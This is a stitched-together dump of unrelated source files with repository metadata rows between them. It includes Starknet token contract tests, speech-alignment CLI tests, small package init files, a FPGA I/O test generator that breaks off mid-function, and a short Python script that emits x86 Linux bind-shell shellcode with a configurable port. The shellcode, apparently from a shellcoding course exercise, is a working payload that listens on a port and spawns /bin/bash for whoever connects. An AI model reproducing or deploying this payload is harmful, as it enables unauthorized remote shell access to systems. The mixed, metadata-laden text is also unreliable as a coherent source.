await token_contract.increaseAllowance(
spender=uninitialized_account, added_value=uint256(APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
with pytest.raises(StarkException, match="assert \(is_overflow\) = 0"):
await token_contract.increaseAllowance(
spender=uninitialized_account, added_value=uint256(AMOUNT_BOUND - APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
@pytest.mark.asyncio
async def test_decrease_allowance_zero_spender(token_contract: StarknetContract, uint256: Callable):
approve_amount = uint256(APPROVE_AMOUNT)
with pytest.raises(StarkException, match="assert_not_zero\(enough_allowance\)"):
await token_contract.decreaseAllowance(spender=0, subtracted_value=approve_amount).invoke(
caller_address=initialized_account
)
@pytest.mark.asyncio
async def test_decrease_allowance_bigger_than_allowance(
token_contract: StarknetContract, uint256: Callable
):
await token_contract.increaseAllowance(
spender=uninitialized_account, added_value=uint256(APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
with pytest.raises(StarkException, match="assert_not_zero\(enough_allowance\)"):
await token_contract.decreaseAllowance(
spender=uninitialized_account, subtracted_value=uint256(APPROVE_AMOUNT + 1)
).invoke(caller_address=initialized_account)
@pytest.mark.asyncio
async def test_decrease_allowance_invalid_amount(
token_contract: StarknetContract, uint256: Callable
):
with pytest.raises(StarkException, match="uint256_check\(subtracted_value\)"):
await token_contract.decreaseAllowance(
spender=uninitialized_account, subtracted_value=uint256(AMOUNT_BOUND)
).invoke(caller_address=initialized_account)
@pytest.mark.asyncio
async def test_increase_and_decrease_allowance_happy_flow(
token_contract: StarknetContract, uint256: Callable
):
execution_info = await token_contract.allowance(
owner=initialized_account, spender=uninitialized_account
).call()
assert execution_info.result == (uint256(0),)
await token_contract.increaseAllowance(
spender=uninitialized_account, added_value=uint256(APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
execution_info = await token_contract.allowance(
owner=initialized_account, spender=uninitialized_account
).call()
assert execution_info.result == (uint256(APPROVE_AMOUNT),)
await token_contract.decreaseAllowance(
spender=uninitialized_account, subtracted_value=uint256(int(APPROVE_AMOUNT / 2))
).invoke(caller_address=initialized_account)
execution_info = await token_contract.allowance(
owner=initialized_account, spender=uninitialized_account
).call()
assert execution_info.result == (uint256(APPROVE_AMOUNT - int(APPROVE_AMOUNT / 2)),)
@pytest.mark.asyncio
async def test_permissioned_mint_wrong_minter(token_contract: StarknetContract, uint256: Callable):
with pytest.raises(StarkException, match="assert caller_address = permitted_address"):
await token_contract.permissionedMint(
recipient=uninitialized_account, amount=uint256(MINT_AMOUNT)
).invoke(caller_address=MINTER_ADDRESS + 1)
@pytest.mark.asyncio
async def test_permissioned_mint_zero_recipient(
token_contract: StarknetContract, uint256: Callable
):
with pytest.raises(StarkException, match="assert_not_zero\(recipient\)"):
await token_contract.permissionedMint(recipient=0, amount=uint256(MINT_AMOUNT)).invoke(
caller_address=MINTER_ADDRESS
)
@pytest.mark.asyncio
async def test_permissioned_mint_invalid_uint256_amount(
    token_contract: StarknetContract, uint256: Callable
):
    """Minting an amount >= 2**256 must fail the contract's uint256 range check."""
    # Raw string instead of the original pointless f-string (it had no
    # placeholders) with invalid "\(" escape sequences.
    with pytest.raises(StarkException, match=r"uint256_check\(amount\)"):
        await token_contract.permissionedMint(
            recipient=uninitialized_account, amount=uint256(AMOUNT_BOUND)
        ).invoke(caller_address=MINTER_ADDRESS)
@pytest.mark.asyncio
async def test_permissioned_mint_total_supply_out_of_range(
token_contract: StarknetContract, uint256: Callable
):
amount = uint256(AMOUNT_BOUND - initial_total_supply)
with pytest.raises(StarkException, match=f"assert \(is_overflow\) = 0"):
await token_contract.permissionedMint(
recipient=uninitialized_account, amount=amount
).invoke(caller_address=MINTER_ADDRESS)
@pytest.mark.asyncio
async def test_permissioned_mint_happy_flow(token_contract: StarknetContract, uint256: Callable):
await token_contract.permissionedMint(
recipient=uninitialized_account, amount=uint256(MINT_AMOUNT)
).invoke(caller_address=MINTER_ADDRESS)
execution_info = await token_contract.balanceOf(account=uninitialized_account).call()
assert execution_info.result == (uint256(MINT_AMOUNT),)
execution_info = await token_contract.totalSupply().call()
assert execution_info.result == (uint256(initial_total_supply + MINT_AMOUNT),)
@pytest.mark.asyncio
async def test_permissioned_burn_wrong_minter(token_contract: StarknetContract, uint256: Callable):
with pytest.raises(StarkException, match="assert caller_address = permitted_address"):
await token_contract.permissionedBurn(
account=initialized_account, amount=uint256(BURN_AMOUNT)
).invoke(caller_address=MINTER_ADDRESS + 1)
@pytest.mark.asyncio
async def test_permissioned_burn_zero_account(token_contract: StarknetContract, uint256: Callable):
with pytest.raises(StarkException, match="assert_not_zero\(account\)"):
await token_contract.permissionedBurn(account=0, amount=uint256(BURN_AMOUNT)).invoke(
caller_address=MINTER_ADDRESS
)
@pytest.mark.asyncio
async def test_permissioned_burn_invalid_uint256_amount(
token_contract: StarknetContract, uint256: Callable
):
with pytest.raises(StarkException, match=f"uint256_check\(amount\)"):
await token_contract.permissionedBurn(
account=initialized_account, amount=uint256(AMOUNT_BOUND)
).invoke(caller_address=MINTER_ADDRESS)
@pytest.mark.asyncio
async def test_permissioned_burn_amount_bigger_than_balance(
token_contract: StarknetContract, uint256: Callable
):
amount = uint256(initial_balances[initialized_account] + 1)
with pytest.raises(StarkException, match=f"assert_not_zero\(enough_balance\)"):
await token_contract.permissionedBurn(account=initialized_account, amount=amount).invoke(
caller_address=MINTER_ADDRESS
)
@pytest.mark.asyncio
async def test_permissioned_burn_happy_flow(token_contract: StarknetContract, uint256: Callable):
await token_contract.permissionedMint(
recipient=initialized_account, amount=uint256(MINT_AMOUNT)
).invoke(caller_address=MINTER_ADDRESS)
await token_contract.permissionedBurn(
account=initialized_account, amount=uint256(BURN_AMOUNT)
).invoke(caller_address=MINTER_ADDRESS)
expected_balance = uint256(initial_balances[initialized_account] + MINT_AMOUNT - BURN_AMOUNT)
execution_info = await token_contract.balanceOf(account=initialized_account).call()
assert execution_info.result == (expected_balance,)
execution_info = await token_contract.totalSupply().call()
assert execution_info.result == (uint256(initial_total_supply + MINT_AMOUNT - BURN_AMOUNT),)
| 40.885437 | 100 | 0.772226 | 2,367 | 21,056 | 6.5733 | 0.071821 | 0.094415 | 0.074041 | 0.052317 | 0.844077 | 0.809885 | 0.782634 | 0.74992 | 0.71682 | 0.665981 | 0 | 0.021829 | 0.140625 | 21,056 | 514 | 101 | 40.964981 | 0.838022 | 0.019519 | 0 | 0.562963 | 0 | 0 | 0.040362 | 0.030962 | 0 | 0 | 0 | 0 | 0.103704 | 1 | 0.004938 | false | 0 | 0.024691 | 0 | 0.046914 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
792807d1205a07683d66ba772f2e177c3fde461e | 2,778 | py | Python | tests/test_commandline_transcribe.py | erayee/Montreal-Forced-Aligner | becd3b316d1999212910b4d0976e8c0405241493 | [
"MIT"
] | 702 | 2016-06-14T23:18:05.000Z | 2022-03-28T07:39:54.000Z | tests/test_commandline_transcribe.py | erayee/Montreal-Forced-Aligner | becd3b316d1999212910b4d0976e8c0405241493 | [
"MIT"
] | 399 | 2016-06-15T17:02:58.000Z | 2022-03-31T06:21:41.000Z | tests/test_commandline_transcribe.py | erayee/Montreal-Forced-Aligner | becd3b316d1999212910b4d0976e8c0405241493 | [
"MIT"
] | 175 | 2016-07-27T15:26:04.000Z | 2022-03-22T04:05:57.000Z | import os
import sys
import pytest
from montreal_forced_aligner.command_line.transcribe import run_transcribe_corpus
from montreal_forced_aligner.command_line.mfa import parser
def test_transcribe(basic_corpus_dir, sick_dict_path, english_acoustic_model, generated_dir,
                    transcription_acoustic_model, transcription_language_model, temp_dir, transcribe_config):
    """Smoke-test `mfa transcribe` on the basic corpus via the CLI argument parser."""
    output_path = os.path.join(generated_dir, 'transcribe_test')
    # Build the CLI invocation exactly as a user would type it.
    command = ['transcribe', basic_corpus_dir, sick_dict_path, transcription_acoustic_model,
               transcription_language_model, output_path,
               '-t', temp_dir, '-q', '--clean', '--debug', '-v', '--config_path', transcribe_config]
    args, unknown = parser.parse_known_args(command)
    run_transcribe_corpus(args)
def test_transcribe_arpa(basic_corpus_dir, sick_dict_path, english_acoustic_model, generated_dir,
                         transcription_acoustic_model, transcription_language_model_arpa, temp_dir, transcribe_config):
    """Same as test_transcribe but with an ARPA-format language model."""
    if sys.platform == 'win32':
        # LM conversion tooling is unavailable on Windows.
        pytest.skip('No LM generation on Windows')
    output_path = os.path.join(generated_dir, 'transcribe_test')
    command = ['transcribe', basic_corpus_dir, sick_dict_path, transcription_acoustic_model,
               transcription_language_model_arpa, output_path,
               '-t', temp_dir, '-q', '--clean', '--debug', '-v', '--config_path', transcribe_config]
    args, unknown = parser.parse_known_args(command)
    run_transcribe_corpus(args)
def test_transcribe_speaker_dictionaries(multilingual_ipa_corpus_dir, ipa_speaker_dict_path, english_ipa_acoustic_model, generated_dir,
                                         transcription_language_model, temp_dir, transcribe_config):
    """Transcribe a multilingual IPA corpus using per-speaker dictionaries."""
    output_path = os.path.join(generated_dir, 'transcribe_test')
    command = ['transcribe', multilingual_ipa_corpus_dir, ipa_speaker_dict_path, english_ipa_acoustic_model,
               transcription_language_model, output_path,
               '-t', temp_dir, '-q', '--clean', '--debug', '--config_path', transcribe_config]
    args, unknown = parser.parse_known_args(command)
    run_transcribe_corpus(args)
def test_transcribe_speaker_dictionaries_evaluate(multilingual_ipa_tg_corpus_dir, ipa_speaker_dict_path, english_ipa_acoustic_model, generated_dir,
                                                  transcription_language_model, temp_dir, transcribe_config):
    """Per-speaker-dictionary transcription with the --evaluate flag (TextGrid corpus)."""
    output_path = os.path.join(generated_dir, 'transcribe_test')
    command = ['transcribe', multilingual_ipa_tg_corpus_dir, ipa_speaker_dict_path, english_ipa_acoustic_model,
               transcription_language_model, output_path,
               '-t', temp_dir, '-q', '--clean', '--debug', '--config_path', transcribe_config, '--evaluate']
    args, unknown = parser.parse_known_args(command)
    run_transcribe_corpus(args)
7938e7963caddb154d982f74722a4ba303875369 | 86 | py | Python | problems/__init__.py | iamstevepaul/MRTA-Attention | fc177440f7354212c41ad02ef76fdda43cc0aa57 | [
"MIT"
] | 1 | 2021-12-14T01:04:22.000Z | 2021-12-14T01:04:22.000Z | problems/__init__.py | iamstevepaul/MRTA-Attention | fc177440f7354212c41ad02ef76fdda43cc0aa57 | [
"MIT"
] | null | null | null | problems/__init__.py | iamstevepaul/MRTA-Attention | fc177440f7354212c41ad02ef76fdda43cc0aa57 | [
"MIT"
] | null | null | null | from problems.vrp.problem_vrp import CVRP
from problems.mrta.problem_mrta import MRTA
| 28.666667 | 43 | 0.860465 | 14 | 86 | 5.142857 | 0.5 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 86 | 2 | 44 | 43 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f7381d635f3c0ce2d25584e3dfa645a0f5a58cc1 | 45 | py | Python | easyfilemanager/__init__.py | RaphaelNanje/easyfilemanager | 29cb6ad90dc28de41478ce7ed768917051f0988a | [
"MIT"
] | null | null | null | easyfilemanager/__init__.py | RaphaelNanje/easyfilemanager | 29cb6ad90dc28de41478ce7ed768917051f0988a | [
"MIT"
] | null | null | null | easyfilemanager/__init__.py | RaphaelNanje/easyfilemanager | 29cb6ad90dc28de41478ce7ed768917051f0988a | [
"MIT"
] | null | null | null | from easyfilemanager.core import FileManager
| 22.5 | 44 | 0.888889 | 5 | 45 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.97561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f77cf6e3e3b57daa1f3fcfcbe5de8cdb309158e6 | 1,147 | py | Python | 1/create_shellcode.py | 91fc7b/SLAE | 8ba0831963b077cb3739b8bb53ed430cd3b564e0 | [
"Unlicense"
] | null | null | null | 1/create_shellcode.py | 91fc7b/SLAE | 8ba0831963b077cb3739b8bb53ed430cd3b564e0 | [
"Unlicense"
] | null | null | null | 1/create_shellcode.py | 91fc7b/SLAE | 8ba0831963b077cb3739b8bb53ed430cd3b564e0 | [
"Unlicense"
] | null | null | null | #!/usr/bin/python
import sys
shellcode_start = "\\x31\\xc9\\x89\\xc8\\xb0\\x66\\x89\\xcb\\xb3\\x01\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\\xc2\\x31\\xc9\\x89\\xc8\\xb0\\x66\\x89\\xcb\\xb3\\x02\\x51\\x66\\x68"
shellcode_port = "\\x04\\xd2" #1234
shellcode_end = "\\x66\\x6a\\x02\\x89\\xe1\\x6a\\x10\\x51\\x52\\x89\\xe1\\xcd\\x80\\x31\\xc9\\x89\\xc8\\xb0\\x66\\x89\\xcb\\xb3\\x04\\x6a\\x05\\x52\\x89\\xe1\\xcd\\x80\\x31\\xc9\\x89\\xc8\\xb0\\x66\\x89\\xcb\\xb3\\x05\\x51\\x51\\x52\\x89\\xe1\\xcd\\x80\\x89\\xc2\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xb1\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xb1\\x02\\xcd\\x80\\x31\\xc0\\xb0\\x0b\\x31\\xc9\\x51\\x68\\x62\\x61\\x73\\x68\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80"
if len(sys.argv) == 2:
port_number = int(sys.argv[1])
#port_number = 1234
port_str = "{0:0{1}x}".format(port_number,4)
shellcode_port = "\\x" + port_str[0] + port_str[1] + "\\x" + port_str[2] + port_str[3]
#print "DEBUG " + shellcode_port
print shellcode_start + shellcode_port + shellcode_end
| 57.35 | 583 | 0.625109 | 212 | 1,147 | 3.306604 | 0.278302 | 0.077033 | 0.064194 | 0.068474 | 0.410842 | 0.389444 | 0.376605 | 0.32525 | 0.291013 | 0.21398 | 0 | 0.214945 | 0.054926 | 1,147 | 19 | 584 | 60.368421 | 0.431734 | 0.060157 | 0 | 0 | 0 | 0.222222 | 0.707635 | 0.684358 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.111111 | null | null | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f788413489ce0f689a7eeb6bbff4155d882fc6f7 | 21,161 | py | Python | xc7/tests/iosettings/generate.py | nfrancque/symbiflow-arch-defs | 14b0f43a50b515602bd48606e4edf8366459c63f | [
"ISC"
] | null | null | null | xc7/tests/iosettings/generate.py | nfrancque/symbiflow-arch-defs | 14b0f43a50b515602bd48606e4edf8366459c63f | [
"ISC"
] | null | null | null | xc7/tests/iosettings/generate.py | nfrancque/symbiflow-arch-defs | 14b0f43a50b515602bd48606e4edf8366459c63f | [
"ISC"
] | null | null | null | #!/usr/bin/env python3
"""
The generator
"""
import argparse
import simplejson as json
# =============================================================================
PINOUT = {
"basys3":
{
"BUFG":
"BUFGCTRL_X0Y0",
"clock":
"W5",
"led":
[
"U16",
"E19",
"U19",
"V19",
"W18",
"U15",
"U14",
"V14",
"V13",
"V3",
"W3",
"U3",
"P3",
"N3",
"P1",
"L1",
],
"single-ended":
[
# Basys3 JB 1-4, 7-10
"A14",
"A16",
"B15",
"B16",
"A15",
"A17",
"C15",
"C16",
# Basys3 JC 1-4, 7-10
"K17",
"M18",
"N17",
"P18",
"L17",
"M19",
"P17",
"R18"
],
"differential":
[
# Basys3 JB
("A14", "A15"),
("A16", "A17"),
("C15", "B15"),
("B16", "C16"),
# Basys3 JC
("M19", "M18"),
("K17", "L17"),
("N17", "P17"),
("P18", "R18"),
]
},
"arty":
{
"BUFG":
"BUFGCTRL_X0Y0",
"clock":
"E3",
"led":
[
"G6", # R0
"G3", # R1
"J3", # R2
"K1", # R3
"F6", # G0
"J4", # G1
"J2", # G2
"H6", # G3
"E1", # B0
"G4", # B1
"H4", # B2
"K2", # B3
"H5", # LED4
"J5", # LED5
"T9", # LED6
"T10", # LED7
],
"single-ended":
[
# Pmod JB
"E15",
"E16",
"D15",
"C15",
"J17",
"J18",
"K15",
"J15",
# Pmod JC
"U12",
"V12",
"V10",
"V11",
"U14",
"V14",
"T13",
"U13",
],
"differential":
[
# Pmod JB
("E15", "E16"),
("D15", "C15"),
("J17", "J18"),
("K15", "J15"),
# Pmod JC
("U12", "V12"),
("V10", "V11"),
("U14", "V14"),
("T13", "U13"),
]
},
# Pinout for "bottom" routing graph of 50t, only for Basys3. These pins may
# not correspond to actual LEDs so the design may not be suitable for testing
# on hardware but it will pass all the checks on CI.
"basys3-bottom":
{
"BUFG":
"BUFGCTRL_X0Y0",
"clock":
"W5", # Bank 34
"led":
[
"V3", # LED9
"W3", # LED10
"U3", # LED11
"W7", # CA
"W6", # CB
"U8", # CC
"V8", # CD
"U5", # CE
"V5", # CF
"U7", # CG
],
"single-ended":
[
# Basys3 JC 1-4, 7-10
"K17",
"M18",
"N17",
"P18",
"L17",
"M19",
"P17",
"R18",
"U15", # LEDs
"U16",
"V13",
"V14",
],
"differential":
[
# Basys3 JC
("M18", "M19"),
("L17", "K17"),
("P17", "N17"),
("R18", "P18"),
]
},
}
def unquote(s):
    """Return *s* with all double-quote characters removed if it is a
    string; non-string values pass through unchanged."""
    if not isinstance(s, str):
        return s
    return s.replace('"', "")
# =============================================================================
def generate_output(board, iostandard, drives, slews):
    """
    Generates a design which outputs 100Hz square wave to a number of pins
    in which each one has different DRIVE+SLEW setting. The IOSTANDARD is
    common for all of them.
    """
    pinout = PINOUT[board]
    port_count = len(drives) * len(slews)
    iosettings = {}

    # Module header: one output bit per DRIVE x SLEW combination.
    verilog = """
module top(
input wire clk,
output wire [{}:0] out
);
""".format(port_count - 1)
    pcf = """
set_io clk {}
""".format(pinout["clock"])

    # 100Hz square wave generator fed through an explicitly placed BUFG.
    verilog += """
wire clk_bufg;
reg [31:0] cnt_ps;
reg tick;
(* LOC = "{}" *)
BUFG bufg (.I(clk), .O(clk_bufg));
initial cnt_ps <= 0;
initial tick <= 0;
always @(posedge clk_bufg)
if (cnt_ps >= (100000000 / (2*100)) - 1) begin
cnt_ps <= 0;
tick <= !tick;
end else begin
cnt_ps <= cnt_ps + 1;
tick <= tick;
end
""".format(pinout["BUFG"])

    # Instantiate one OBUF per (slew, drive) combination.
    combos = ((s, d) for s in slews for d in drives)
    for idx, (slew, drive) in enumerate(combos):
        params = {"IOSTANDARD": "\"{}\"".format(iostandard)}
        if drive is not None and drive != "0":
            params["DRIVE"] = int(drive)
        if slew is not None:
            params["SLEW"] = "\"{}\"".format(slew)

        pin = pinout["single-ended"][idx]
        param_str = ",".join(
            ".{}({})".format(k, v) for k, v in params.items()
        )
        verilog += """
OBUF # ({params}) obuf_{index} (
.I(tick),
.O(out[{index}])
);
""".format(params=param_str, index=idx)

        # A single-bit port has no index in the PCF.
        if port_count > 1:
            pcf += "set_io out[{}] {}\n".format(idx, pin)
        else:
            pcf += "set_io out {}\n".format(pin)

        iosettings[pin] = {k: unquote(v) for k, v in params.items()}

    # Module footer
    verilog += """
endmodule
"""
    return verilog, pcf, iosettings
def generate_input(board, iostandard, in_terms):
    """
    Generates a design where signals from external pins go through IBUFs
    and registers to LEDs. Each IBUF has a different IN_TERM setting.
    """
    pinout = PINOUT[board]
    port_count = len(in_terms)
    iosettings = {}

    # Module header: one input bit and one LED per IN_TERM setting.
    verilog = """
module top(
input wire clk,
input wire [{N}:0] inp,
output reg [{N}:0] led
);
initial led <= 0;
""".format(N=port_count - 1)
    pcf = """
set_io clk {}
""".format(pinout["clock"])

    # Clock distribution through an explicitly placed BUFG.
    verilog += """
wire clk_bufg;
(* LOC = "{}" *)
BUFG bufg (.I(clk), .O(clk_bufg));
""".format(pinout["BUFG"])

    # One IBUF + capture register per IN_TERM setting.
    for idx, in_term in enumerate(in_terms):
        params = {
            "IOSTANDARD": "\"{}\"".format(iostandard),
            "IN_TERM": "\"{}\"".format(in_term)
        }

        pin = pinout["single-ended"][idx]
        param_str = ",".join(
            ".{}({})".format(k, v) for k, v in params.items()
        )
        verilog += """
wire inp_b[{index}];
IBUF # ({params}) ibuf_{index} (
.I(inp[{index}]),
.O(inp_b[{index}])
);
always @(posedge clk_bufg)
led[{index}] <= inp_b[{index}];
""".format(params=param_str, index=idx)

        # Single-bit ports carry no index in the PCF.
        if port_count > 1:
            pcf += "set_io inp[{}] {}\n".format(idx, pin)
            pcf += "set_io led[{}] {}\n".format(idx, pinout["led"][idx])
        else:
            pcf += "set_io inp {}\n".format(pin)
            pcf += "set_io led {}\n".format(pinout["led"][idx])

        iosettings[pin] = {k: unquote(v) for k, v in params.items()}

    # Module footer
    verilog += """
endmodule
"""
    return verilog, pcf, iosettings
def generate_inout(board, iostandard, drives, slews):
    """
    Generates a design with INOUT buffers. Buffers cycle through states:
    L,Z,H,Z with 100Hz frequency. During the Z state, IO pins are latched
    and their state is presented on LEDs.
    """
    pinout = PINOUT[board]
    port_count = len(drives) * len(slews)
    iosettings = {}

    # Module header: one bidirectional bit per DRIVE x SLEW combination.
    verilog = """
module top(
input wire clk,
inout wire [{N}:0] ino,
output reg [{N}:0] led
);
initial led <= 0;
wire [{N}:0] ino_i;
reg ino_o;
reg ino_t;
""".format(N=port_count - 1)
    pcf = """
set_io clk {}
""".format(pinout["clock"])

    # Tri-state / data control generator plus a sampler that latches the
    # pin state onto LEDs whenever the buffers are in the Z state.
    verilog += """
wire clk_bufg;
reg [31:0] cnt_ps;
(* LOC = "{}" *)
BUFG bufg (.I(clk), .O(clk_bufg));
initial cnt_ps <= 32'd0;
initial ino_o <= 1'b0;
initial ino_t <= 1'b1;
always @(posedge clk_bufg)
if (cnt_ps >= (100000000 / (2*100)) - 1) begin
cnt_ps <= 0;
ino_t <= !ino_t;
if (ino_t == 1'b1)
ino_o <= !ino_o;
end else begin
cnt_ps <= cnt_ps + 1;
ino_t <= ino_t;
ino_o <= ino_o;
end
always @(posedge clk_bufg)
if (ino_t == 1'b1)
led <= ino_i;
else
led <= led;
""".format(pinout["BUFG"])

    # Instantiate one IOBUF per (slew, drive) combination.
    combos = ((s, d) for s in slews for d in drives)
    for idx, (slew, drive) in enumerate(combos):
        params = {"IOSTANDARD": "\"{}\"".format(iostandard)}
        if drive is not None and drive != "0":
            params["DRIVE"] = int(drive)
        if slew is not None:
            params["SLEW"] = "\"{}\"".format(slew)

        pin = pinout["single-ended"][idx]
        param_str = ",".join(
            ".{}({})".format(k, v) for k, v in params.items()
        )
        verilog += """
IOBUF # ({params}) iobuf_{index} (
.I(ino_o),
.O(ino_i[{index}]),
.T(ino_t),
.IO(ino[{index}])
);
""".format(params=param_str, index=idx)

        # Single-bit ports carry no index in the PCF.
        if port_count > 1:
            pcf += "set_io ino[{}] {}\n".format(idx, pin)
            pcf += "set_io led[{}] {}\n".format(idx, pinout["led"][idx])
        else:
            pcf += "set_io ino {}\n".format(pin)
            pcf += "set_io led {}\n".format(pinout["led"][idx])

        iosettings[pin] = {k: unquote(v) for k, v in params.items()}

    # Module footer
    verilog += """
endmodule
"""
    return verilog, pcf, iosettings
# =============================================================================
def generate_diff_output(board, iostandard, drives, slews):
    """
    Generates a design which outputs 100Hz square wave to a number of
    differential pin pairs in which each one has different DRIVE+SLEW
    setting. The IOSTANDARD is common for all of them.
    """
    pinout = PINOUT[board]
    port_count = len(drives) * len(slews)
    iosettings = {}

    # Module header: one P/N pair per DRIVE x SLEW combination.
    verilog = """
module top(
input wire clk,
output wire [{N}:0] out_p,
output wire [{N}:0] out_n
);
""".format(N=port_count - 1)
    pcf = """
set_io clk {}
""".format(pinout["clock"])

    # 100Hz square wave generator fed through an explicitly placed BUFG.
    verilog += """
wire clk_bufg;
reg [31:0] cnt_ps;
reg tick;
(* LOC = "{}" *)
BUFG bufg (.I(clk), .O(clk_bufg));
initial cnt_ps <= 0;
initial tick <= 0;
always @(posedge clk_bufg)
if (cnt_ps >= (100000000 / (2*100)) - 1) begin
cnt_ps <= 0;
tick <= !tick;
end else begin
cnt_ps <= cnt_ps + 1;
tick <= tick;
end
""".format(pinout["BUFG"])

    # Instantiate one OBUFDS per (slew, drive) combination.
    combos = ((s, d) for s in slews for d in drives)
    for idx, (slew, drive) in enumerate(combos):
        params = {"IOSTANDARD": "\"{}\"".format(iostandard)}
        if drive is not None and drive != "0":
            params["DRIVE"] = int(drive)
        if slew is not None:
            params["SLEW"] = "\"{}\"".format(slew)

        pin_p, pin_n = pinout["differential"][idx]
        param_str = ",".join(
            ".{}({})".format(k, v) for k, v in params.items()
        )
        verilog += """
OBUFDS # ({params}) obuf_{index} (
.I(tick),
.O(out_p[{index}]),
.OB(out_n[{index}])
);
""".format(params=param_str, index=idx)

        # Single-bit ports carry no index in the PCF.
        if port_count > 1:
            pcf += "set_io out_p[{}] {}\n".format(idx, pin_p)
            pcf += "set_io out_n[{}] {}\n".format(idx, pin_n)
        else:
            pcf += "set_io out_p {}\n".format(pin_p)
            pcf += "set_io out_n {}\n".format(pin_n)

        # Both pins of the pair share the same settings.
        iosettings[pin_p] = {k: unquote(v) for k, v in params.items()}
        iosettings[pin_n] = {k: unquote(v) for k, v in params.items()}

    # Module footer
    verilog += """
endmodule
"""
    return verilog, pcf, iosettings
def generate_diff_input(board, iostandard, in_terms):
    """
    Generates a design where signals from external differential pin pairs
    go through IBUFDS and registers to LEDs. Each IBUFDS has a different
    IN_TERM setting.
    """
    pinout = PINOUT[board]
    port_count = len(in_terms)
    iosettings = {}

    # Module header: one P/N input pair and one LED per IN_TERM setting.
    verilog = """
module top(
input wire clk,
input wire [{N}:0] inp_p,
input wire [{N}:0] inp_n,
output reg [{N}:0] led
);
initial led <= 0;
""".format(N=port_count - 1)
    pcf = """
set_io clk {}
""".format(pinout["clock"])

    # Clock distribution through an explicitly placed BUFG.
    verilog += """
wire clk_bufg;
(* LOC = "{}" *)
BUFG bufg (.I(clk), .O(clk_bufg));
""".format(pinout["BUFG"])

    # One IBUFDS + capture register per IN_TERM setting.
    for idx, in_term in enumerate(in_terms):
        params = {
            "IOSTANDARD": "\"{}\"".format(iostandard),
            "IN_TERM": "\"{}\"".format(in_term)
        }

        pin_p, pin_n = pinout["differential"][idx]
        param_str = ",".join(
            ".{}({})".format(k, v) for k, v in params.items()
        )
        verilog += """
wire inp_b[{index}];
IBUFDS # ({params}) ibuf_{index} (
.I(inp_p[{index}]),
.IB(inp_n[{index}]),
.O(inp_b[{index}])
);
always @(posedge clk_bufg)
led[{index}] <= inp_b[{index}];
""".format(params=param_str, index=idx)

        # Single-bit ports carry no index in the PCF.
        if port_count > 1:
            pcf += "set_io inp_p[{}] {}\n".format(idx, pin_p)
            pcf += "set_io inp_n[{}] {}\n".format(idx, pin_n)
            pcf += "set_io led[{}] {}\n".format(idx, pinout["led"][idx])
        else:
            pcf += "set_io inp_p {}\n".format(pin_p)
            pcf += "set_io inp_n {}\n".format(pin_n)
            pcf += "set_io led {}\n".format(pinout["led"][idx])

        # Both pins of the pair share the same settings.
        iosettings[pin_p] = {k: unquote(v) for k, v in params.items()}
        iosettings[pin_n] = {k: unquote(v) for k, v in params.items()}

    # Module footer
    verilog += """
endmodule
"""
    return verilog, pcf, iosettings
def generate_diff_inout(board, iostandard, drives, slews):
    """
    Generates a design with differential INOUT buffers. Buffers cycle
    through states: L,Z,H,Z with 100Hz frequency. During the Z state, IO
    pins are latched and their state is presented on LEDs.
    """
    pinout = PINOUT[board]
    port_count = len(drives) * len(slews)
    iosettings = {}

    # Module header: one P/N pair per DRIVE x SLEW combination.
    verilog = """
module top(
input wire clk,
inout wire [{N}:0] ino_p,
inout wire [{N}:0] ino_n,
output reg [{N}:0] led
);
initial led <= 0;
wire [{N}:0] ino_i;
reg ino_o;
reg ino_t;
""".format(N=port_count - 1)
    pcf = """
set_io clk {}
""".format(pinout["clock"])

    # Tri-state / data control generator plus a sampler that latches the
    # pin state onto LEDs whenever the buffers are in the Z state.
    verilog += """
wire clk_bufg;
reg [31:0] cnt_ps;
(* LOC = "{}" *)
BUFG bufg (.I(clk), .O(clk_bufg));
initial cnt_ps <= 32'd0;
initial ino_o <= 1'b0;
initial ino_t <= 1'b1;
always @(posedge clk_bufg)
